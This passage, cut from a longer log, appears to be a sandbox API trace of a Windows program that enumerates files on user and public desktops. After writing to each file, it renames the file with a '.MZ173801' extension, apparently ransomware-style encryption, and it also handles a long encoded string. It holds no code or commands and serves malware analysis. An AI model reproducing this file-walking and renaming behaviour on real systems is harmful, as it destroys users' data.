hFile=0x414, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x2008, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f6f0*=0x2008, lpOverlapped=0x0) returned 1 [0124.472] CloseHandle (hObject=0x414) returned 1 [0124.472] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\_5 PohF4cOl3RenyNkzK.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\_5 pohf4col3renynkzk.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\_5 PohF4cOl3RenyNkzK.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\_5 pohf4col3renynkzk.gif.mz173801")) returned 1 [0124.472] GetCurrentThreadId () returned 0x1358 [0124.473] GetCurrentThreadId () returned 0x1358 [0124.473] GetCurrentThreadId () returned 0x1358 [0124.473] GetCurrentThreadId () returned 0x1358 [0124.473] GetCurrentThreadId () returned 0x1358 [0124.473] GetCurrentThreadId () returned 0x1358 [0124.473] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9bfcd0, ftCreationTime.dwHighDateTime=0x1d5e0ee, ftLastAccessTime.dwLowDateTime=0xf3bf4bb0, ftLastAccessTime.dwHighDateTime=0x1d5ed04, ftLastWriteTime.dwLowDateTime=0xf3bf4bb0, ftLastWriteTime.dwHighDateTime=0x1d5ed04, nFileSizeHigh=0x0, nFileSizeLow=0x2008, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="_5 PohF4cOl3RenyNkzK.gif", cAlternateFileName="_5POHF~1.GIF")) returned 0 [0124.473] GetLastError () returned 0x12 [0124.473] FindClose (in: hFindFile=0xa1bc40 | out: hFindFile=0xa1bc40) returned 1 [0124.473] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6453c8c0, ftCreationTime.dwHighDateTime=0x1d5efb1, ftLastAccessTime.dwLowDateTime=0xab76784e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab76784e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bd20 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6453c8c0, ftCreationTime.dwHighDateTime=0x1d5efb1, ftLastAccessTime.dwLowDateTime=0xab76784e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab76784e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55626c0, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x3e284d50, ftLastAccessTime.dwHighDateTime=0x1d5e274, ftLastWriteTime.dwLowDateTime=0xab492bdc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2472, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="3067xe8riKxNNoH.m4a.MZ173801", cAlternateFileName="3067XE~1.MZ1")) returned 1 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea40b20, ftCreationTime.dwHighDateTime=0x1d5eb89, ftLastAccessTime.dwLowDateTime=0x687995b0, ftLastAccessTime.dwHighDateTime=0x1d5e692, ftLastWriteTime.dwLowDateTime=0xab492bdc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9e85, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6ja7hKM dEHm7uKsn.png.MZ173801", cAlternateFileName="6JA7HK~1.MZ1")) returned 1 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17950850, ftCreationTime.dwHighDateTime=0x1d5e9d0, ftLastAccessTime.dwLowDateTime=0xd38fbf60, ftLastAccessTime.dwHighDateTime=0x1d5e9c5, ftLastWriteTime.dwLowDateTime=0xab505295, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x180f4, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="76of.jpg.MZ173801", cAlternateFileName="76OFJP~1.MZ1")) returned 1 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4a9c90, ftCreationTime.dwHighDateTime=0x1d5f08d, ftLastAccessTime.dwLowDateTime=0x677e6cb0, ftLastAccessTime.dwHighDateTime=0x1d5ea8b, ftLastWriteTime.dwLowDateTime=0xab52b570, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x8394, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="a_IiCl.png.MZ173801", cAlternateFileName="A_IICL~1.MZ1")) returned 1 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa110b1a0, ftCreationTime.dwHighDateTime=0x1d5e229, ftLastAccessTime.dwLowDateTime=0xe78d1f50, ftLastAccessTime.dwHighDateTime=0x1d5eaea, ftLastWriteTime.dwLowDateTime=0xab52b570, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xf4ee, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="DReqJFNMJBL_6uj.mkv.MZ173801", cAlternateFileName="DREQJF~1.MZ1")) returned 1 [0124.473] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.473] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.473] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb686470, ftCreationTime.dwHighDateTime=0x1d5eb3c, ftLastAccessTime.dwLowDateTime=0xbfaf2100, ftLastAccessTime.dwHighDateTime=0x1d5ea26, ftLastWriteTime.dwLowDateTime=0xab551812, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xab5a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="hEI_tuSWJhfHIz05Nj8z.flv.MZ173801", cAlternateFileName="HEI_TU~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56419200, ftCreationTime.dwHighDateTime=0x1d5e334, ftLastAccessTime.dwLowDateTime=0xe3196650, ftLastAccessTime.dwHighDateTime=0x1d5eb3e, ftLastWriteTime.dwLowDateTime=0xab551812, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xbd5, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="HPSq.wav.MZ173801", cAlternateFileName="HPSQWA~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d3ec10, ftCreationTime.dwHighDateTime=0x1d5e45d, ftLastAccessTime.dwLowDateTime=0x3195c960, ftLastAccessTime.dwHighDateTime=0x1d5e4f8, ftLastWriteTime.dwLowDateTime=0xab71b39d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xc414, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="I2nm.png.MZ173801", cAlternateFileName="I2NMPN~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd570c30, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0xa8c8da60, ftLastAccessTime.dwHighDateTime=0x1d5e0dc, ftLastWriteTime.dwLowDateTime=0xab71b39d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x185b8, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="jxZ9.mp3.MZ173801", cAlternateFileName="JXZ9MP~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1abb9f0, ftCreationTime.dwHighDateTime=0x1d5e9e8, ftLastAccessTime.dwLowDateTime=0x4a9fa360, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0xab7418f5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17ae2, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="kplNa-lUk W _j.avi.MZ173801", cAlternateFileName="KPLNA-~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x451ae90, ftCreationTime.dwHighDateTime=0x1d5eae5, ftLastAccessTime.dwLowDateTime=0x869d6160, ftLastAccessTime.dwHighDateTime=0x1d5e4cc, ftLastWriteTime.dwLowDateTime=0xab76784e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16cb3, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="w WakBZH3I.pps.MZ173801", cAlternateFileName="WWAKBZ~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9bfcd0, ftCreationTime.dwHighDateTime=0x1d5e0ee, ftLastAccessTime.dwLowDateTime=0xf3bf4bb0, ftLastAccessTime.dwHighDateTime=0x1d5ed04, ftLastWriteTime.dwLowDateTime=0xab76784e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2008, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="_5 PohF4cOl3RenyNkzK.gif.MZ173801", cAlternateFileName="_5POHF~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9bfcd0, ftCreationTime.dwHighDateTime=0x1d5e0ee, ftLastAccessTime.dwLowDateTime=0xf3bf4bb0, ftLastAccessTime.dwHighDateTime=0x1d5ed04, ftLastWriteTime.dwLowDateTime=0xab76784e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2008, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="_5 PohF4cOl3RenyNkzK.gif.MZ173801", cAlternateFileName="_5POHF~1.MZ1")) returned 0 [0124.474] GetLastError () returned 0x12 [0124.474] FindClose (in: hFindFile=0xa1bd20 | out: hFindFile=0xa1bd20) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c679c30, ftCreationTime.dwHighDateTime=0x1d5e13c, ftLastAccessTime.dwLowDateTime=0x9f9f16a0, ftLastAccessTime.dwHighDateTime=0x1d5ea34, ftLastWriteTime.dwLowDateTime=0xab361a10, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4618, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XJ_f36txKuev6.mkv.MZ173801", cAlternateFileName="XJ_F36~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa50b4200, ftCreationTime.dwHighDateTime=0x1d5e933, ftLastAccessTime.dwLowDateTime=0x5c7ddb60, ftLastAccessTime.dwHighDateTime=0x1d5e564, ftLastWriteTime.dwLowDateTime=0xab44674e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3262, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XVeVbH-.gif.MZ173801", cAlternateFileName="XVEVBH~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2948af00, ftCreationTime.dwHighDateTime=0x1d5e937, ftLastAccessTime.dwLowDateTime=0x3e678140, ftLastAccessTime.dwHighDateTime=0x1d5e63a, ftLastWriteTime.dwLowDateTime=0xab44674e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xc7b4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ZB jpmR.mp3.MZ173801", cAlternateFileName="ZBJPMR~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.474] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe492b420, ftCreationTime.dwHighDateTime=0x1d5e641, ftLastAccessTime.dwLowDateTime=0xb651a2f0, ftLastAccessTime.dwHighDateTime=0x1d5edb3, ftLastWriteTime.dwLowDateTime=0xab46c972, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1279e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcrVUSJG.png.MZ173801", cAlternateFileName="ZCRVUS~1.MZ1")) returned 1 [0124.474] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.474] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.475] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe492b420, ftCreationTime.dwHighDateTime=0x1d5e641, ftLastAccessTime.dwLowDateTime=0xb651a2f0, ftLastAccessTime.dwHighDateTime=0x1d5edb3, ftLastWriteTime.dwLowDateTime=0xab46c972, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1279e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcrVUSJG.png.MZ173801", cAlternateFileName="ZCRVUS~1.MZ1")) returned 0 [0124.475] GetLastError () returned 0x12 [0124.475] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0124.475] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0124.485] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop" (normalized: "c:\\users\\public\\desktop")) returned 0x13 [0124.485] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0124.485] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0124.485] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0124.485] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk", cAlternateFileName="ACROBA~1.LNK")) returned 1 [0124.485] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0124.485] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.485] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" (normalized: "c:\\users\\public\\desktop\\acrobat reader dc.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852)) returned 1 [0124.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 